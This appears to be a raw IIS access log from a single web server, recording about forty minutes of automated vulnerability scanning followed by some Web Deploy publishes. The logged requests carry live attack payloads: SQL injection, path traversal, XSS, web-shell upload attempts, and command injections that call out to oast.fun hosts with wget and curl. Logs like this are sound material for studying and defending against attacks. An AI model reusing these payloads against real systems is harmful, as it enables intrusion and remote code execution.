Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 09:17:53 103.153.214.94 GET /nagiosxi/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 220 2024-12-12 09:17:54 103.153.214.94 GET /nagiosxi/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 217 2024-12-12 09:18:15 103.153.214.94 GET /nagiosxi/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.24 - 404 7 0 211 2024-12-12 09:18:42 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 68 2024-12-12 09:19:00 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 34 2024-12-12 09:19:17 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 40 2024-12-12 09:19:17 103.153.214.94 POST /confluence/pages/createpage-entervariables.action SpaceKey=x 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 09:19:17 103.153.214.94 POST /pages/doenterpagevariables.action - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 198 2024-12-12 09:19:17 103.153.214.94 POST /wiki/pages/createpage-entervariables.action SpaceKey=x 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 198 2024-12-12 09:19:17 103.153.214.94 POST /pages/templates2/viewpagetemplate.action - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 200 2024-12-12 09:19:17 103.153.214.94 POST /users/user-dark-features - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 200 2024-12-12 09:19:18 103.153.214.94 POST /pages/createpage.action spaceKey=myproj 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 204 2024-12-12 09:19:18 103.153.214.94 POST /wiki/pages/createpage-entervariables.action - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.3 - 404 7 0 204 2024-12-12 09:19:18 103.153.214.94 POST /template/custom/content-editor - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.19 - 404 7 0 206 2024-12-12 09:19:18 103.153.214.94 POST /confluence/pages/createpage-entervariables.action - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.6+Safari/605.1.15 - 404 7 0 217 2024-12-12 09:19:18 103.153.214.94 POST /pages/createpage-entervariables.action - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 09:19:18 103.153.214.94 POST /pages/createpage-entervariables.action SpaceKey=x 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 214 2024-12-12 09:19:18 103.153.214.94 POST /templates/editor-preload-container - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12.5)+AppleWebKit/617.19+(KHTML,+like+Gecko)+Version/17.6.47+Safari/617.19 - 404 7 0 213 2024-12-12 09:19:18 103.153.214.94 POST /pages/createpage-entervariables.action - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 232 2024-12-12 09:19:24 103.153.214.94 POST /contactus.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/11.1+Safari/605.1.15 - 404 7 0 197 2024-12-12 09:19:24 103.153.214.94 POST /contactus.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 201 2024-12-12 09:20:22 103.153.214.94 GET / rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 197 2024-12-12 09:20:26 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 09:20:46 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 50 2024-12-12 09:21:04 103.153.214.94 GET /component_server - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-12 09:21:08 103.153.214.94 POST /api/snapshots - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 213 2024-12-12 09:26:14 103.153.214.94 GET /gz/LoadOtherTreeServlet modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 09:27:27 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/2q6JQiqGaWoEktWjOAJZLO4oyL8.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 09:27:31 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/barcode.php text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2q6JQiqGaWoEktWjOAJZLO4oyL8.php 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 202 2024-12-12 09:27:34 103.153.214.94 POST /wp-content/plugins/wpcargo/includes/2q6JQiqGaWoEktWjOAJZLO4oyL8.php 1=var_dump 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 09:28:47 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 201 2024-12-12 09:28:56 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.79 - 404 7 0 39 2024-12-12 09:29:14 103.153.214.94 GET /component_server - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 09:29:31 103.153.214.94 POST /lumis/portal/controller/xml/PageControllerXml.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.54+Safari/537.36 - 404 7 0 212 2024-12-12 09:30:48 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.3+Safari/605.1.15 - 404 7 0 205 2024-12-12 09:31:32 103.153.214.94 POST /OAapp/bfapp/buffalo/workFlowService - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 49 2024-12-12 09:32:28 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/11.1+Safari/605.1.15 - 404 7 0 225 2024-12-12 09:32:28 103.153.214.94 GET /assets/app/something/services/AppModule.class/ - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 09:32:45 103.153.214.94 POST /eps/resourceOperations/upload.action - 8172 - 206.238.196.225 MicroMessenger - 404 7 0 62 2024-12-12 09:33:04 103.153.214.94 GET /file/Placard/upload/Imo_DownLoadUI.php cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 43 2024-12-12 09:33:59 103.153.214.94 POST /center/api/files;.js - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 82 2024-12-12 09:34:17 103.153.214.94 GET /clusterMgr/EuFtI3.jsp;.js - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 40 2024-12-12 09:34:35 103.153.214.94 POST /HandleEvent - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 09:34:35 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 09:34:49 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.12;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 200 2024-12-12 09:34:55 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 208 2024-12-12 09:34:55 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 235 2024-12-12 09:36:24 103.153.214.94 POST /goform/setmac - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/index.htmlr 404 7 0 203 2024-12-12 09:36:49 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 202 2024-12-12 09:37:19 103.153.214.94 POST /tools.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/tools.cgi 404 7 0 207 2024-12-12 09:37:21 103.153.214.94 POST /tools.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/tools.cgi 404 7 0 219 2024-12-12 09:38:07 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 - 404 7 0 124 2024-12-12 09:38:07 103.153.214.94 GET /appGet.cgi hook=get_cfg_clientlist() 8172 - 156.251.25.152 asusrouter-- https://bcvt.kontum.gov.vn:8172 404 7 0 204 2024-12-12 09:38:40 103.153.214.94 POST /RPC2_Login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0,+Win64,+x64,+rv:128.0)+Gecko/20100101+Firefox/128.0 https://bcvt.kontum.gov.vn:8172 404 7 0 204 2024-12-12 09:38:40 103.153.214.94 GET /status.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.15 - 404 7 0 205 2024-12-12 09:38:40 103.153.214.94 GET /search.php search=%22;wget+http%3A%2F%2Fctd67t3bclspkptm3qo0zbt1a3byyehbm.oast.fun%27;%22 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 09:39:26 103.153.214.94 PATCH /redfish/v1/SessionService/ResetPassword/1/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/8.0.0+Version/17.4.1+Safari/605.1.15 - 404 7 0 230 2024-12-12 09:39:31 103.153.214.94 POST /redfish/v1/SessionService/Sessions/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/8.0.0+Version/17.4.1+Safari/605.1.15 - 404 7 0 208 2024-12-12 09:39:51 103.153.214.94 POST /jc6/servlet/clobfield - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 174 2024-12-12 09:40:00 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 126 2024-12-12 09:40:55 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 241 2024-12-12 09:40:57 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 8172 - 156.251.25.152 Nacos-Server - 404 7 0 220 2024-12-12 09:41:24 103.153.214.94 GET /admin/index.php p=ajax-ops&op=elfinder&cmd=mkfile&name=2q6JQdSVBehlkXz309JyYHOEG3X.php&target=l1_Lw 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 198 2024-12-12 09:44:24 103.153.214.94 GET /uapi-cgi/certmngr.cgi action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ctd67t3bclspkptm3qo01wzwodbtij157.oast.fun)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 224 2024-12-12 09:44:26 103.153.214.94 POST /tc.CBS.Appl/tcspseudo - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 09:46:22 103.153.214.94 GET /Visitor/bin/WebStrings.srf file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>alert(document.domain)</script> 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 09:46:23 103.153.214.94 POST / Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 09:46:40 103.153.214.94 POST /Visitor/bin/WebStrings.srf obj_name=win.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 09:46:58 103.153.214.94 GET /Visitor/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 400 0 0 36 2024-12-12 09:48:51 103.153.214.94 POST /goform/formWsc - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 09:49:37 103.153.214.94 POST /cgi/networkDiag.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 208 2024-12-12 09:49:37 103.153.214.94 GET /dashboardUser - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 09:49:58 103.153.214.94 GET / action=command&command=set_city_timezone&value=$(wget%20http://ctd67t3bclspkptm3qo0ofh3z49oii1he.oast.fun)) 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 222 2024-12-12 09:50:08 103.153.214.94 GET /index.php option=com_booking&controller=customer&task=getUserData&id=123 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 36 2024-12-12 09:51:18 103.153.214.94 POST /home/download - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 09:52:20 103.153.214.94 POST /Config/SaveUploadedHotspotLogoFile - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 225 2024-12-12 09:52:22 103.153.214.94 GET /Assets/temp/hotspot/img/logohotspot.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/113.0 - 404 7 0 224 2024-12-12 09:53:24 103.153.214.94 POST /wsman - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 217 2024-12-12 09:53:59 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 198 2024-12-12 09:53:59 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 218 2024-12-12 09:54:08 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 09:54:44 103.153.214.94 GET /login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.36 - 404 7 0 210 2024-12-12 09:55:50 103.153.214.94 PUT /SDK/webLanguage - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:99.0)+Gecko/20100101+Firefox/99.0 - 404 7 0 220 2024-12-12 09:55:50 103.153.214.94 POST /ajaxPages/writeBrowseFilePathAjax.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 09:55:52 103.153.214.94 GET /2q6JQj6U11i8f4kkY8Lz6QN0a4p.php cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//ctd67t3bclspkptm3qo0e93yf1rxpnpnn.oast.fun+-H+'User-Agent%3a+8moV2l'")}' 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:93.0)+Gecko/20100101+Firefox/93.0 - 404 7 0 202 2024-12-12 09:55:52 103.153.214.94 GET /x - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 224 2024-12-12 09:55:53 103.153.214.94 GET /module/ph_simpleblog/list sb_category=')%20OR%20true--%20- 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 236 2024-12-12 09:55:55 103.153.214.94 GET /module/ph_simpleblog/list sb_category=')%20AND%20false--%20- 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 09:56:50 103.153.214.94 POST /api/terminals - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_7_3;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.7+Safari/605.1.15 - 404 7 0 78 2024-12-12 09:57:28 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 09:58:40 103.153.214.94 POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 221 2024-12-12 09:58:50 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 116.96.77.140 - - 401 2 5 32 2024-12-12 09:58:50 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 48 2024-12-12 09:58:50 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 30 2024-12-12 09:58:50 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=3b6251df-d6af-443b-82b9-3d2f86a95046;op=Sync - 200 0 0 380 2024-12-12 09:58:50 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 504 2024-12-12 09:58:56 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 26 2024-12-12 09:58:56 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 25 2024-12-12 09:58:58 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=a773cb85-1ded-48e2-8f9a-383c3371e0d8;op=Sync - 200 0 0 1038 2024-12-12 09:58:58 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 1147 2024-12-12 09:58:58 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 22 2024-12-12 09:58:59 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=a773cb85-1ded-48e2-8f9a-383c3371e0d8;op=Sync - 200 0 0 860 2024-12-12 09:58:59 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 963 2024-12-12 09:59:11 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.21 https://bcvt.kontum.gov.vn:8172 404 7 0 204 2024-12-12 09:59:14 103.153.214.94 POST /wp-login.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 https://bcvt.kontum.gov.vn:8172 404 7 0 225 2024-12-12 09:59:17 103.153.214.94 GET /wp-admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.26 - 404 7 0 224 2024-12-12 09:59:25 103.153.214.94 POST /geoserver/TestWfsPost - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.27 - 404 7 0 207 2024-12-12 09:59:47 103.153.214.94 